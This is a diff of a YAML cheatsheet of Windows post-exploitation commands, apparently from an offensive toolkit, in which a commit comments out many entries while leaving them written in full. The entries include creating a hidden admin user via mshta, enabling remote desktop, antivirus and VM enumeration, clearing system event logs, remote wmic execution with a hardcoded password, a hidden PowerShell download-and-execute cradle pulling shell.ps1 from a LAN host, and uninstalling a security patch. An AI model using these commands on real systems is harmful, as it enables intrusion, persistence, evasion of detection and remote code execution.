@@ -9,10 +9,10 @@ cheatsheet:
99 description : add user to admin group
1010 privilege : administrator
1111
12- -
13- cmd : mshta vbscript:CreateObject(\"Shell.Application\").ShellExecute(\"cmd.exe\",\"/c net user hacker$ 123456@cctv /add\",\"\",\"runas\",1)(window.close)
14- description : add new user (need to be turned off UAC!)
15- privilege : user
12+ # -
13+ # cmd: mshta vbscript:CreateObject(\"Shell.Application\").ShellExecute(\"cmd.exe\",\"/c net user hacker$ 123456@cctv /add\",\"\",\"runas\",1)(window.close)
14+ # description: add new user (need to be turned off UAC!)
15+ # privilege: user
1616
1717 -
1818 cmd : whoami /all /fo list
@@ -49,15 +49,15 @@ cheatsheet:
4949 description : registry add startup items (HKCU)
5050 privilege : administrator
5151
52- -
53- cmd : reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /t REG_DWORD /v portnumber /d 3389 /f
54- description : open 3389 remote desktop (step_1:set remote desktop port)
55- privilege : administrator
52+ # -
53+ # cmd: reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /t REG_DWORD /v portnumber /d 3389 /f
54+ # description: open 3389 remote desktop (step_1:set remote desktop port)
55+ # privilege: administrator
5656
57- -
58- cmd : wmic RDTOGGLE WHERE ServerName=\"%COMPUTERNAME%\" call SetAllowTSConnections 1 && netstat -an|findstr 3389
59- description : open 3389 remote desktop (step_2:wmic opens remote desktop)
60- privilege : administrator
57+ # -
58+ # cmd: wmic RDTOGGLE WHERE ServerName=\"%COMPUTERNAME%\" call SetAllowTSConnections 1 && netstat -an|findstr 3389
59+ # description: open 3389 remote desktop (step_2:wmic opens remote desktop)
60+ # privilege: administrator
6161
6262 -
6363 cmd : sc query
@@ -84,15 +84,15 @@ cheatsheet:
8484 description : displays all wireless network configurations on the local computer
8585 privilege : user
8686
87- -
88- cmd : netsh interface ipv4 show config
89- description : display local ip address and other network info
90- privilege : user
87+ # -
88+ # cmd: netsh interface ipv4 show config
89+ # description: display local ip address and other network info
90+ # privilege: user
9191
92- -
93- cmd : netsh interface ipv4 set dnsservers name=\"WLAN 2\" static 10.0.0.1 primary
94- description : modify dns config
95- privilege : administrator
92+ # -
93+ # cmd: netsh interface ipv4 set dnsservers name=\"WLAN 2\" static 10.0.0.1 primary
94+ # description: modify dns config
95+ # privilege: administrator
9696
9797 -
9898 cmd : arp -a
@@ -109,60 +109,60 @@ cheatsheet:
109109 description : enumerate summaries of all processes
110110 privilege : user
111111
112- -
113- cmd : wmic useraccount list full
114- description : list all info of all local users
115- privilege : user
112+ # -
113+ # cmd: wmic useraccount list full
114+ # description: list all info of all local users
115+ # privilege: user
116116
117- -
118- cmd : wmic share list
119- description : list all shared resources locally
120- privilege : user
117+ # -
118+ # cmd: wmic share list
119+ # description: list all shared resources locally
120+ # privilege: user
121121
122- -
123- cmd : wmic service get caption,name,startmode,state
124- description : list services
125- privilege : user
122+ # -
123+ # cmd: wmic service get caption,name,startmode,state
124+ # description: list services
125+ # privilege: user
126126
127- -
128- cmd : wmic product get name
129- description : get a list of installed apps
130- privilege : user
127+ # -
128+ # cmd: wmic product get name
129+ # description: get a list of installed apps
130+ # privilege: user
131131
132- -
133- cmd : wmic sysdriver get caption,name,pathname,servicetype,state,status /format:list
134- description : get driver info
135- privilege : user
132+ # -
133+ # cmd: wmic sysdriver get caption,name,pathname,servicetype,state,status /format:list
134+ # description: get driver info
135+ # privilege: user
136136
137- -
138- cmd : wmic os get /format:list
139- description : get operating system details
140- privilege : user
137+ # -
138+ # cmd: wmic os get /format:list
139+ # description: get operating system details
140+ # privilege: user
141141
142- -
143- cmd : wmic onboarddevice get description,devicetype,enabled
144- description : determine whether the system is a virtual machine through onboard info
145- privilege : user
142+ # -
143+ # cmd: wmic onboarddevice get description,devicetype,enabled
144+ # description: determine whether the system is a virtual machine through onboard info
145+ # privilege: user
146146
147- -
148- cmd : wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct get DisplayName,PathToSignedProductExe
149- description : Enumerates info about the target anti-virus product
150- privilege : user
147+ # -
148+ # cmd: wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct get DisplayName,PathToSignedProductExe
149+ # description: Enumerates info about the target anti-virus product
150+ # privilege: user
151151
152- -
153- cmd : wmic startup get caption,command,location,user
154- description : view startup items
155- privilege : user
152+ # -
153+ # cmd: wmic startup get caption,command,location,user
154+ # description: view startup items
155+ # privilege: user
156156
157- -
158- cmd : wmic nteventlog where filename=\"system\" cleareventlog
159- description : clear system log records
160- privilege : administrator
157+ # -
158+ # cmd: wmic nteventlog where filename=\"system\" cleareventlog
159+ # description: clear system log records
160+ # privilege: administrator
161161
162- -
163- cmd : wmic /node:192.168.123.113 /password:\"123456\" /user:\"administrator\" process call create \"cmd.exe /c shutdown /p\"
164- description : execute commands remotely
165- privilege : user
162+ # -
163+ # cmd: wmic /node:192.168.123.113 /password:\"123456\" /user:\"administrator\" process call create \"cmd.exe /c shutdown /p\"
164+ # description: execute commands remotely
165+ # privilege: user
166166
167167 -
168168 cmd : net view /domain:XXX
@@ -244,42 +244,42 @@ cheatsheet:
244244 description : install msi installation package
245245 privilege : user
246246
247- -
248- cmd : powershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:7789/shell.ps1')\";
249- description : powerShell load remote script
250- privilege : user
251-
252- -
253- cmd : mshta vbscript:msgbox(\"hello\",36,\"are you ok?\")(window.close)
254- description : pop up message box
255- privilege : user
256-
257- -
258- cmd : mshta vbscript:CreateObject(\"sapi.spvoice\").speak(\"Hello!I am Hacker\")(window.close)
259- description : voice reading
260- privilege : user
261-
262- -
263- cmd : mshta vbscript:CreateObject(\"Shell.Application\").MinimizeAll()(window.close)
264- description : minimize the desktop window
265- privilege : user
266-
267- -
268- cmd : rundll32 user32.dll,LockWorkStation
269- description : lock screen
270- privilege : user
271-
272- -
273- cmd : rundll32 powrprof.dll,SetSuspendState
274- description : put the computer to sleep
275- privilege : user
276-
277- -
278- cmd : rundll32 url.dll,FileProtocolHandler https://github.com/Ptkatz
279- description : open the Web page
280- privilege : user
281-
282- -
283- cmd : wusa /uninstall /kb:4012598 /quiet /norestart
284- description : uninstall the KB patch
285- privilege : user
247+ # -
248+ # cmd: powershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.200:7789/shell.ps1')\";
249+ # description: powerShell load remote script
250+ # privilege: user
251+
252+ # -
253+ # cmd: mshta vbscript:msgbox(\"hello\",36,\"are you ok?\")(window.close)
254+ # description: pop up message box
255+ # privilege: user
256+
257+ # -
258+ # cmd: mshta vbscript:CreateObject(\"sapi.spvoice\").speak(\"Hello!I am Hacker\")(window.close)
259+ # description: voice reading
260+ # privilege: user
261+
262+ # -
263+ # cmd: mshta vbscript:CreateObject(\"Shell.Application\").MinimizeAll()(window.close)
264+ # description: minimize the desktop window
265+ # privilege: user
266+
267+ # -
268+ # cmd: rundll32 user32.dll,LockWorkStation
269+ # description: lock screen
270+ # privilege: user
271+
272+ # -
273+ # cmd: rundll32 powrprof.dll,SetSuspendState
274+ # description: put the computer to sleep
275+ # privilege: user
276+
277+ # -
278+ # cmd: rundll32 url.dll,FileProtocolHandler https://github.com/Ptkatz
279+ # description: open the Web page
280+ # privilege: user
281+
282+ # -
283+ # cmd: wusa /uninstall /kb:4012598 /quiet /norestart
284+ # description: uninstall the KB patch
285+ # privilege: user
0 commit comments